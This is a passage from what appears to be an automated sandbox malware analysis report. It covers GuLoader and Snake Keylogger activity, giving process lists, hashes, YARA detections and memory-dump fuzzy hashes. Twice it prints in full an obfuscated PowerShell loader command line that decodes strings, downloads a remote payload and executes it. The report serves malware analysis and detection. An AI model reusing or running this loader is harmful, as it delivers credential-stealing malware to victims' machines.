uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swankpot=(Hjlpeprster 'Victo$ Kns.G GenelCyanoOserpebChaffATriviLDepla:UnderhTrichUBadelmAutokrPegaiFPleocoMoth,rOpbrulBundtA Ga,nDSyn aTBalde2Skole0Gener6Krteg=SkribNDi tceBran w Unfa-ProleODish bPa acjSni,sEKo ancAktiotDulc DivasvejfoYRigh sObnouTHunknEMisgoMSoodl.Unc mn etste Delit,yele.Pro eWPruneePladsB,uahuC Vejrl StatiRoyniETicktnElectt gulp ');Snoose ($Swankpot);Snoose (Hjlpeprster 'Irrec$ uperHMyriauSparrmKlinkr hokfCock oPege rKinemlN tteaNedkodTheoltM ssa2 Tils0aboun6Abra .SaphaH Prole SortaMensedGalabeBlrebrAlpehsBukke[Knled$Stin EInterrSco,cy soustGrundhGookbrGodaro eriscGoersyReliktAn.iqeFus.osVagte] K ns=Unpoe$DamasWHemo eTitreaForsrkDrag l FilmyDispo ');$Tilbedendes=Hjlpeprster ' Tele$Se.ulHMat auTodimm S ytrFinanfSuperoC.intrG naelPrimoaTalpidSin.nt Sk v2 t lp0Semig6 efl. PearD SpaloTilbawLnninnInt rlSammeoSp,ciaBesrgdHemerF ExhaiUnivelFripoeanthi( Tele$ orsBFreeleSmrreh DrilaAkt evAr eai.omocoCykeluUnvirrAks ei,habasRe lutMnst , Hksa$ B stJBy aaeNu,lew andeEpigolstounlPampheAzoter Hea,iBogkaeParodsKvadr)Endem ';$Jewelleries=$Hildede;Snoose (Hjlpeprster 'Libe,$AsperGPani L Sk.vOEk.trbetikeASlvsml E,il:Aargas ,amuK R stR SparIpennyn SkriL FortGMobilGNonageU pron In.eDCh sme SinoSWeakf=schn (P cketPla teSkobrsH.pertCon e-DybdepN uroaIchthTDeepwhMeini Sa fu$AntenJDataoEAmortw BrygeBambuLLo.nslNotesED,scoRIncomiApoteE .yposPubli)Alber ');while (!$Skrinlggendes) {Snoose (Hjlpeprster ' Pe g$Filthg njurl SomnoMonstb Arrya,eraflBromv: gfoHGriffo MetamMa,asiUph altegn.e lmut Outlisu,ersMedrikSeedn1Att c3Gross5 npu=r.alt$ isemt ImoerUnconu Non eLo.me ') ;Snoose $Tilbedendes;Snoose (Hjlpeprster ' EnddsTeknoTVegetaIggieRSgereTTrste- Hepts VigelBogfoe.solieI dfjPF,stb Si.ds4Laane ');Snoose (Hjlpeprster 'beslu$T turG owerlFant OElemebLea eAEncloLSup,r:RealisSemiakUnknorDeliliBryssNParall noppG Par gTamaseDomicnCressd abbErumstsFisk,=Fi bl(BesigT CwtsEEthy.SJu,elTloghe-RetsvPSkraaasa antVelgrHSprin colo$fa,iljUnderE ReabwUnraiE KommL Gtt,lGymnaeNonguRPrenaIForhaeUndersEntwi) Huck ') ;Snoose (Hjlpeprster 'Jawbo$NiveaGEctodL unitO ammebTabbyA SygelH ars: OdonwHovedaEjendlLysseeEjendD Turk8Kniks8Reorg=Occul$ IchtGNy aaLBolstO kamBXerodaTork.l Mace:U.addBCamaliPartilGr,ffLLigniOOmlssw Daae+Stedv+ Regu%Slgts$ finglMunk,sSkrfeB P.oul aberAStigsDNonseeTilra2 ang5Chair4 Tr n.TurisCUlig.OVinnau litenHushoTOverr ') ;$Behaviourist=$Lsblade254[$Waled88];}$Chlorinity144=319932;$Gldesls=31552;Snoose (Hjlpeprster 'Shi l$ ForbgSlsomLRoypoo UdstBGynanApaaa LRheop:ktternClockOcabreNLangbepe talRouleEDisemc AptstFatl,OSolidrd.epa Flyv=Cysto Fingg GlobeudsprtD,kan-PrunecHekseO PresnMeni tGalanEshakenEpi,eTBheng D.ton$ MeckJStkkeEStyesW Lab eProd.l SiliLDoedee KrearFe,eriSveinEF steSStifi ');Snoose (Hjlpeprster 'Morde$CrossgGy pelPar.uoc,ugabTildkaArb.jlSkraa:TouseSAbonnl Ra,gySgenanOversgH,arslDeta eAlludrFostrnLozene uart ontr=C rpo Del c[ Hau S Sluty FasasOldwitGiolieQuadem Solo.SkftnCTekstoVarianSinkevBarb.eFrijar,riestMorge]Ta.ef: Matt:BandsFKollar I,proPor rmGhe.tB Som,aI paksIndgre jemf6Afh g4 ErodS.ettitOksekrInteri SrsynSkr,dgPl gg(Bly.n$unporNOm ipoSenion She,eSelvslFlirteCalc cI spht versoB urtr Flde) Clea ');Snoose (Hjlpeprster 'Seri,$ConfiG Udk l .ndeo FlinBPipleaArbitlSmarm: RgelsDiploa ClerNVandoOCoc sPHereaU,bsfaRAs heUJeblilFredses nhenSpkkeTHusli Besov=Kompl Uncom[Man isSagtmyFst.gsFaktuTMetise nigoMBeg e.D.scrTP ankeEnkelXUn,ovTEtypi.StalaeGenklNVict.CLnregoCentrdDesi i.minknmordeGLa db]Caper: Akti:rufgaAFdselS S abcGum,oIReno.iSi.di.SplutG RebeeSka kt .azaSUndisTDiftor AgtsIBrudfNPrecog Spr,(grdes$KollasBastaL A miy Th.nn.nbelGPrivaLSermoeA falrAfspnnVagabE Inly)Mue d ');Snoose (Hjlpeprster 'Lengt$ FlorgRoyallH.rnbO HuedbMar,ia CentLPisse:EveryHOppr.a PreegPani IThoraOCables b nncAnmelo UdmupR,gboEOutbe=Se.im$Hens,sRegreaBasguNMasseo.enisP brugUReprsRSagfrUMastuLLilleeD ismNRe ixtGia t.SammeSaflukUBondeBUnders T egtNotanRaskebI nabn NavngCheck(Min.a$ ilieC.pareHUnmerlInte.o Re urTe evi,denonS,tieIVr ltt Cal,yUnsil1Aflev4 K.eb4S nkt,Etrus$,vrgrg For,LRapi DQuieteP,rvisUdkl LH,mats Bar ) herm ');Snoose $Hagioscope;"
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:03:27:32
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:04:47:59
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swankpot=(Hjlpeprster 'Victo$ Kns.G GenelCyanoOserpebChaffATriviLDepla:UnderhTrichUBadelmAutokrPegaiFPleocoMoth,rOpbrulBundtA Ga,nDSyn aTBalde2Skole0Gener6Krteg=SkribNDi tceBran w Unfa-ProleODish bPa acjSni,sEKo ancAktiotDulc DivasvejfoYRigh sObnouTHunknEMisgoMSoodl.Unc mn etste Delit,yele.Pro eWPruneePladsB,uahuC Vejrl StatiRoyniETicktnElectt gulp ');Snoose ($Swankpot);Snoose (Hjlpeprster 'Irrec$ uperHMyriauSparrmKlinkr hokfCock oPege rKinemlN tteaNedkodTheoltM ssa2 Tils0aboun6Abra .SaphaH Prole SortaMensedGalabeBlrebrAlpehsBukke[Knled$Stin EInterrSco,cy soustGrundhGookbrGodaro eriscGoersyReliktAn.iqeFus.osVagte] K ns=Unpoe$DamasWHemo eTitreaForsrkDrag l FilmyDispo ');$Tilbedendes=Hjlpeprster ' Tele$Se.ulHMat auTodimm S ytrFinanfSuperoC.intrG naelPrimoaTalpidSin.nt Sk v2 t lp0Semig6 efl. PearD SpaloTilbawLnninnInt rlSammeoSp,ciaBesrgdHemerF ExhaiUnivelFripoeanthi( Tele$ orsBFreeleSmrreh DrilaAkt evAr eai.omocoCykeluUnvirrAks ei,habasRe lutMnst , Hksa$ B stJBy aaeNu,lew andeEpigolstounlPampheAzoter Hea,iBogkaeParodsKvadr)Endem ';$Jewelleries=$Hildede;Snoose (Hjlpeprster 'Libe,$AsperGPani L Sk.vOEk.trbetikeASlvsml E,il:Aargas ,amuK R stR SparIpennyn SkriL FortGMobilGNonageU pron In.eDCh sme SinoSWeakf=schn (P cketPla teSkobrsH.pertCon e-DybdepN uroaIchthTDeepwhMeini Sa fu$AntenJDataoEAmortw BrygeBambuLLo.nslNotesED,scoRIncomiApoteE .yposPubli)Alber ');while (!$Skrinlggendes) {Snoose (Hjlpeprster ' Pe g$Filthg njurl SomnoMonstb Arrya,eraflBromv: gfoHGriffo MetamMa,asiUph altegn.e lmut Outlisu,ersMedrikSeedn1Att c3Gross5 npu=r.alt$ isemt ImoerUnconu Non eLo.me ') ;Snoose $Tilbedendes;Snoose (Hjlpeprster ' EnddsTeknoTVegetaIggieRSgereTTrste- Hepts VigelBogfoe.solieI dfjPF,stb Si.ds4Laane ');Snoose (Hjlpeprster 'beslu$T turG owerlFant OElemebLea eAEncloLSup,r:RealisSemiakUnknorDeliliBryssNParall noppG Par gTamaseDomicnCressd abbErumstsFisk,=Fi bl(BesigT CwtsEEthy.SJu,elTloghe-RetsvPSkraaasa antVelgrHSprin colo$fa,iljUnderE ReabwUnraiE KommL Gtt,lGymnaeNonguRPrenaIForhaeUndersEntwi) Huck ') ;Snoose (Hjlpeprster 'Jawbo$NiveaGEctodL unitO ammebTabbyA SygelH ars: OdonwHovedaEjendlLysseeEjendD Turk8Kniks8Reorg=Occul$ IchtGNy aaLBolstO kamBXerodaTork.l Mace:U.addBCamaliPartilGr,ffLLigniOOmlssw Daae+Stedv+ Regu%Slgts$ finglMunk,sSkrfeB P.oul aberAStigsDNonseeTilra2 ang5Chair4 Tr n.TurisCUlig.OVinnau litenHushoTOverr ') ;$Behaviourist=$Lsblade254[$Waled88];}$Chlorinity144=319932;$Gldesls=31552;Snoose (Hjlpeprster 'Shi l$ ForbgSlsomLRoypoo UdstBGynanApaaa LRheop:ktternClockOcabreNLangbepe talRouleEDisemc AptstFatl,OSolidrd.epa Flyv=Cysto Fingg GlobeudsprtD,kan-PrunecHekseO PresnMeni tGalanEshakenEpi,eTBheng D.ton$ MeckJStkkeEStyesW Lab eProd.l SiliLDoedee KrearFe,eriSveinEF steSStifi ');Snoose (Hjlpeprster 'Morde$CrossgGy pelPar.uoc,ugabTildkaArb.jlSkraa:TouseSAbonnl Ra,gySgenanOversgH,arslDeta eAlludrFostrnLozene uart ontr=C rpo Del c[ Hau S Sluty FasasOldwitGiolieQuadem Solo.SkftnCTekstoVarianSinkevBarb.eFrijar,riestMorge]Ta.ef: Matt:BandsFKollar I,proPor rmGhe.tB Som,aI paksIndgre jemf6Afh g4 ErodS.ettitOksekrInteri SrsynSkr,dgPl gg(Bly.n$unporNOm ipoSenion She,eSelvslFlirteCalc cI spht versoB urtr Flde) Clea ');Snoose (Hjlpeprster 'Seri,$ConfiG Udk l .ndeo FlinBPipleaArbitlSmarm: RgelsDiploa ClerNVandoOCoc sPHereaU,bsfaRAs heUJeblilFredses nhenSpkkeTHusli Besov=Kompl Uncom[Man isSagtmyFst.gsFaktuTMetise nigoMBeg e.D.scrTP ankeEnkelXUn,ovTEtypi.StalaeGenklNVict.CLnregoCentrdDesi i.minknmordeGLa db]Caper: Akti:rufgaAFdselS S abcGum,oIReno.iSi.di.SplutG RebeeSka kt .azaSUndisTDiftor AgtsIBrudfNPrecog Spr,(grdes$KollasBastaL A miy Th.nn.nbelGPrivaLSermoeA falrAfspnnVagabE Inly)Mue d ');Snoose (Hjlpeprster 'Lengt$ FlorgRoyallH.rnbO HuedbMar,ia CentLPisse:EveryHOppr.a PreegPani IThoraOCables b nncAnmelo UdmupR,gboEOutbe=Se.im$Hens,sRegreaBasguNMasseo.enisP brugUReprsRSagfrUMastuLLilleeD ismNRe ixtGia t.SammeSaflukUBondeBUnders T egtNotanRaskebI nabn NavngCheck(Min.a$ ilieC.pareHUnmerlInte.o Re urTe evi,denonS,tieIVr ltt Cal,yUnsil1Aflev4 K.eb4S nkt,Etrus$,vrgrg For,LRapi DQuieteP,rvisUdkl LH,mats Bar ) herm ');Snoose $Hagioscope;"
                                                                Imagebase:0xd80000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1739244674.00000000086B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1750338876.000000000D2B9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:04:47:59
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:04:48:19
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0xf10000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1558889255.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac3d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af0bc6a5110746ddf375faae1d01ff72fad5f4a6da33469ccb96fc57b607960f
                                                                  • Instruction ID: 548eaa6e2a38038ec0c24f10d304005c21e8b1a883adddb6895d65806f090f28
                                                                  • Opcode Fuzzy Hash: af0bc6a5110746ddf375faae1d01ff72fad5f4a6da33469ccb96fc57b607960f
                                                                  • Instruction Fuzzy Hash: A9F1A230908A8D8FFBA9DF28C855BE977E1FF55314F04866AE84DC7291CB34D9458B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1558889255.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac3d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df4fa3687554e9bb63b2b50a9e8d371b930e8351b784464635adacc211f0ed37
                                                                  • Instruction ID: 7fb22a4cacb87173a78c5a824d03361558d8db55f1872ea50be044d65aa8c25e
                                                                  • Opcode Fuzzy Hash: df4fa3687554e9bb63b2b50a9e8d371b930e8351b784464635adacc211f0ed37
                                                                  • Instruction Fuzzy Hash: 5BE1C170918A8E8FEBA9DF28D855BE977D1FB55310F04866AE80DC7291CF74E8448BC1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1558889255.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac3d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8h$8h$8h
                                                                  • API String ID: 0-967795021
                                                                  • Opcode ID: 30a6d6be7a5a6ae37087787f57f13015eb94f84b916b59fd3d0c590a5502b4e9
                                                                  • Instruction ID: 186d21e0e2cfff34da2b6b396864f7208825d491c714dc8be9895e7c56beb503
                                                                  • Opcode Fuzzy Hash: 30a6d6be7a5a6ae37087787f57f13015eb94f84b916b59fd3d0c590a5502b4e9
                                                                  • Instruction Fuzzy Hash: 2002E430A18A4D8FEB99DF6CC441EA9BBE1FF69310F14416AD04DD7296CA34E886C7D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1558889255.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac3d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6M_L
                                                                  • API String ID: 0-3141243524
                                                                  • Opcode ID: 8306d2420fd65d7b0fd8fde82fa34dbab09b848511e0a089d3b23d710490f2e5
                                                                  • Instruction ID: 84438045baa8505129780c1ea16a6d759c911e506bc9e6e69b2b5ce21c59068a
                                                                  • Opcode Fuzzy Hash: 8306d2420fd65d7b0fd8fde82fa34dbab09b848511e0a089d3b23d710490f2e5
                                                                  • Instruction Fuzzy Hash: BC02C371A09A498FEB89EF5CC495EA9BBE1FF59300F14416AE00DC7296CA34E845CBD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1559629039.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac4a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 29f14c50d61ffd1b3606ea95235a1b6b106d61fdb8bf5fc703848f1aadd02428
                                                                  • Instruction ID: 3dbaa9e9883af068e0bd2980f83939078cfdde21142da5bd3704581b886193c1
                                                                  • Opcode Fuzzy Hash: 29f14c50d61ffd1b3606ea95235a1b6b106d61fdb8bf5fc703848f1aadd02428
                                                                  • Instruction Fuzzy Hash: 17126762A0EB858FF799DB2888596787BD1EF66614F0840FED08DC71D3DE18DC898385
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1558889255.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac3d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 1a68cb7d2fd02cfdf200b8d2c1a8029dccbe1409d4e94c6a6d4ebd188a767b7c
                                                                  • Instruction ID: 0a37ad9a85f129191ed7ce730d0c7d2e271388b048827b5709bef3b6b2d2feda
                                                                  • Opcode Fuzzy Hash: 1a68cb7d2fd02cfdf200b8d2c1a8029dccbe1409d4e94c6a6d4ebd188a767b7c
                                                                  • Instruction Fuzzy Hash: 1BC18070A19A0D8FEF99DF58C485EA9BBE1FF68300F14416AD40DD7295CA34E885CBD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1559629039.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac4a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6<7
                                                                  • API String ID: 0-3237430436
                                                                  • Opcode ID: 2eccd3e25c918501120125cabc2835d1d609a166560561f5cdd99599790a01c1
                                                                  • Instruction ID: f5e91e09741f313027cf5735a3f3ee6d779667eb14654c22fd65b082cc611e44
                                                                  • Opcode Fuzzy Hash: 2eccd3e25c918501120125cabc2835d1d609a166560561f5cdd99599790a01c1
                                                                  • Instruction Fuzzy Hash: E3A136A2E0EE868FFB99DB6C88595B87BD0EF56624B0841BED04DC70D3D918DC4983C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1559629039.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac4a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8h
                                                                  • API String ID: 0-2550175997
                                                                  • Opcode ID: c31dab52ae9f331b0adec9d55ea1e6d0a92f6a1694f1ed16b644dca4b7122298
                                                                  • Instruction ID: cb6ad938aabfb4e250b2815441cc3a8790c5f078a3b19506ef667984976c7a24
                                                                  • Opcode Fuzzy Hash: c31dab52ae9f331b0adec9d55ea1e6d0a92f6a1694f1ed16b644dca4b7122298
                                                                  • Instruction Fuzzy Hash: 4B21D192E0FBC68FF395977C18594A86FD1DF57A14B0840BED08DCB0D3D8188849C39A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1559629039.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac4a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5faf3719784c10743e5135693671ea26657cb475815b677ab55e4ed05486b13e
                                                                  • Instruction ID: c875babc68ffaaaa8bf9448577708716a9bcf37886c195f05d95ff372984ccc4
                                                                  • Opcode Fuzzy Hash: 5faf3719784c10743e5135693671ea26657cb475815b677ab55e4ed05486b13e
                                                                  • Instruction Fuzzy Hash: B2E1036290EBC68FF39A9778585A5B87BD0DF53614B0861BED08DC70E3DD18DC4A8389
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1558889255.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffaac3d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd43cf0edd8a24061d461d210663689ee20a4978a23c630297c895d91514b177
                                                                  • Instruction ID: 1238bee47de1f9f0925a871e90e67cc59d0b72df0cdc698289bb6b1a7f9989d6
